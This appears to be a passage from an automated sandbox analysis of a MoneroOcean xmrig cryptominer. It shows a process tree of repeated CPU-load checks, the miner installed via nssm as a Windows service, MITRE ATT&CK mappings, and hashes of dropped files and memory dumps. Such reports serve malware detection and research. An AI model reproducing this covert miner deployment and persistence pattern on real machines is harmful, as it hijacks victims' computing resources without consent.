    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3156
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:860
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1140
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4588
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:680
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4776
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1048
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2744
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4688
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3796
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4324
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3676
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4136
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4920
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4732
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1428
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2728
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:752
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4596
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4092
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4108

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:316
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
010c219c46b4439bc787644989e20389

SHA1
f3a63066ab4446458bd6417386777e39e09b9b25

SHA256
2a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa

SHA512
c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1d5d213589d70958dbbff019f03a8df6

SHA1
8db6364bf8e978434b1edf649f04eceb26859766

SHA256
df860a42e8fb71874de4a6c4a1d8515a25597b571c4d3ba9f89bd9f23c24e143

SHA512
c57851c7895cab60f565f03b12d93e1b6d42d617b831cf85f79b1e4d301fa04533e624c09d1b5adad352319655bbeab9f95930622ff4349976b91f834ca5a2c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
19fdfeba3b81dd6b05560437a6f91534

SHA1
987c849d4b221e5694891b3a8a8c6d0fd06dbdd0

SHA256
68612d12fa856ac11b56352d0a1272e16e6410b51c77011e67cb33e9e2e0a470

SHA512
72371ee806cf667f6d7fb93c7d9201e9ea35fab2ea82020cb1e48c8aaf248284236780f3f474f1561cbdee6dcf69128c1564e9a45cb16ee2e30e3ee5f8550e74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2e055aca95b6c2eb0e4820b4384e5b37

SHA1
9f7c06ad6d1657944ccdeba7dc409e1167d33028

SHA256
a803388033386187bfa3bbc42d980d9420739ac5e255e0d893fda220c1594ebf

SHA512
82aa255fefe5cc91cb60257f09aeaeb04e793c9e895bef868512c1d4653496ad10f27673673de7a8e1a2b3f8ceb0fd65fce815a7fa80d6821f3f993ada97b69c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c9100d398e4555e9abf5e4fecddf2580

SHA1
c9a33ef9937c7cabd19c97231cba920515b7345c

SHA256
96bf0003d60d0b6fc64d5bfeeddd611c8b4e235d916d0c6076188e396c4386f1

SHA512
c1a807f9f448b69a9ea7ac574d8671815f4ab3847a516b5197e22c96e772381ca63b1a86ebe0999715ca127301462fd29081769b40bb67bc8d19fcc7905712bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12fccde9b63cb7599f6cd112930ae98a

SHA1
82128aed2504d0b1f2023f7016fef7b8dae0a00e

SHA256
43b2d02b58ab98f966497b5807f7ff81e90ac91bde5926ec9ae6b2f513bcf985

SHA512
83d42abe687dad240afbd466f67f6793f05754967a0cc3e1412fcb7e52bf357b3ddd535cf47e42a5682b364aa6abbc0930fad6c99dbc59fb172fae1a9c7b30ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d1419f5075015a89643e0e2e3ca371bf

SHA1
4af8a4b386b5c31f76d8f467a0665df04c719b98

SHA256
1dffc9faf23db07602681cc783a9f29ec421143897215a3c11469fb75013cd55

SHA512
f5fa6b21e19a244693d0941b6102711a6965b414a2979b4f31aac39cda3a693a802860ff86964d5ddd44f8f3b06988da7ad6f1da87e55818805638569de2a85b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
290580886c0cb49a05fe7e0f70c7bf2b

SHA1
d8295b044e30f68ea48e053ba02cf04d3a543201

SHA256
5313ae3b57e784cb2034b841f27f5bd124203037b4f566d27c11fa94330afeec

SHA512
1d3fa9dc6b139f768662c8a15427e4d14e7ee4ba5683180b9185b8d0816ca5ce5ed57d9ddccc83753384690b9a18cc2c6f3871de66d93112216eace407b34d0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
624415ea673fe5ff69763c05120e3b72

SHA1
7985fa167cc4499a7db1496aaef659218bfc0062

SHA256
b1628ad9fe2f4377eba93c8a641c080bd262e71b7f9d2f2f83a2eff5be1da759

SHA512
5c9c006506d008d710e35104b1ac632c0d3bfa870046ef133e87db99f45a8b1bcc59d164d4dd57d63ca84fa3aae47655905c1c78151585a2415f94ac9a24f605

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7995e4aec63b0756f71b47d545f40ad2

SHA1
ab8c8722dcda60605e420be62ad29229b5781687

SHA256
1b32280514269bd03c5cd84e844fb7d1a843d19c502383dc10a20de21230e6b4

SHA512
6c32b63aea00625774be0d95ebbbfae8cef606a31aa0c6029302ada8fdeb142b714e293d98d81fe1962dd03d2cc93bcdafd162f1ea0742555972a604aba3ccab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
afe3f50cbaaccb9ef47af1d82132026f

SHA1
f2e93e3045fa9b2caecc0ddbc9fc810392c55889

SHA256
973cddbf4825fbf5463a2f6fd224da136ad942d90be8f2381b53d3ef57b05804

SHA512
b58be5c86b239eb9c40832ed1a2368188817e2ebe26084837311d9e0327b3963325d723a6a1e3c133a3ca78acf03f86e5cab8321c385e73b5fca74c1751adf9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b335360780eebb9cdd93aaa4ee46f109

SHA1
fa09c6200d572d8ae3da8c92a3d24573024cc432

SHA256
1948c14b6e419f830669e070d761d765c48fd149c776b9c57d8dde61601fe62c

SHA512
cb7aae39c2202e604238c86efe5c838425d39ca7a0e3919de4e7739fe3775dc4ad22977109b1d8a268f350a60516679428cee7d21a3841b6fbbcf11132ea37ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cbdf290967e47ba8305e916e5b53a220

SHA1
fd8bda265bfa626598f5874bfa764c2cf732f65b

SHA256
a120dd423cc03c18d25e2bc4d692be62a9073af86e9c9419005b325c19e08f73

SHA512
fe03b158871762a690c1356b4212c8daf4e1a9fbe468a4145b182420f8daeef67d69e64dfedbc18159bc39287b82db983311653151dc9f911bd787c0237fc61d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
87a7bc06a358f90a56ec81db55358403

SHA1
2515cbe3e95a0971fa9722650620d93de820b259

SHA256
0696b0cb3198bf791eca5859407423459dba9da98ed7d95a6f961db392004f5f

SHA512
c5c08b03677a6b7c914756690bbf6cf0b50952628a7b68bfb3b5646c4f25fcdb5d3093542f980e0b1769fa3b26d056c4ac1d2eafc287934421852d17db618353

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gjctq3qj.qie.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\script_0cbebcc2.bat

Filesize
556B

MD5
889ed31bd87dcdd18996201e93fca965

SHA1
bebcb6fa0d36fabc6edc469cc3177251bd50dbb8

SHA256
6fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7

SHA512
11e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp70AC.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
65af2c948d2b89c9a105d1fb0b467885

SHA1
1344cc7d00abe84bdbd9f35c7ce4a665e7e45773

SHA256
90f5d28d166590d5854231b924a0115ccc1ebc6c2ae56e14b787b05e83c78e4a

SHA512
37536a9629a61a83cd31f22cfb63d381bc2b13bf4bbc84f40d475b14e7e80df11434697e5b57814fccfcc04be31937aab84de5260af6321111904dfd200a92a6

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
a6b1b89f435a4b6d6387852badfdead2

SHA1
642e1f436b165c27eb9f3b910aaaab3a57377679

SHA256
535dd62fec70484bb2afca0a3d941769d5f410d13e850f72b4b1c23abd9b9f9c

SHA512
3e33812a5c1372b6a243df23eaa2ee8ea464fea40554786066139c3dbd5c9f96249cabbade807f63802bf8da865e67708cebad2ee4fdc9deb61b677e5df8da57

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/704-462-0x00007FF820570000-0x00007FF820F5C000-memory.dmp

Filesize
9.9MB

Download
memory/704-58-0x00007FF820570000-0x00007FF820F5C000-memory.dmp

Filesize
9.9MB

Download
memory/704-59-0x00007FF820570000-0x00007FF820F5C000-memory.dmp

Filesize
9.9MB

Download
memory/704-63-0x00007FF820570000-0x00007FF820F5C000-memory.dmp

Filesize
9.9MB

Download
memory/1140-138-0x0000024F1C680000-0x0000024F1C692000-memory.dmp

Filesize
72KB

Download
memory/1140-137-0x0000024F1C630000-0x0000024F1C63A000-memory.dmp

Filesize
40KB

Download
memory/2452-9-0x0000025AC1010000-0x0000025AC1086000-memory.dmp

Filesize
472KB

Download
memory/2452-8-0x00007FF820570000-0x00007FF820F5C000-memory.dmp

Filesize
9.9MB

Download
memory/2452-5-0x0000025AC0E20000-0x0000025AC0E42000-memory.dmp

Filesize
136KB

Download
memory/2452-2-0x00007FF820573000-0x00007FF820574000-memory.dmp

Filesize
4KB

Download
memory/2452-51-0x00007FF820570000-0x00007FF820F5C000-memory.dmp

Filesize
9.9MB

Download
memory/2452-10-0x00007FF820570000-0x00007FF820F5C000-memory.dmp

Filesize
9.9MB

Download
memory/2452-25-0x00007FF820570000-0x00007FF820F5C000-memory.dmp

Filesize
9.9MB

Download
memory/4188-181-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4188-180-0x0000000000190000-0x00000000001B0000-memory.dmp

Filesize
128KB

Download
memory/4568-471-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4568-494-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4568-465-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4568-466-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4568-467-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
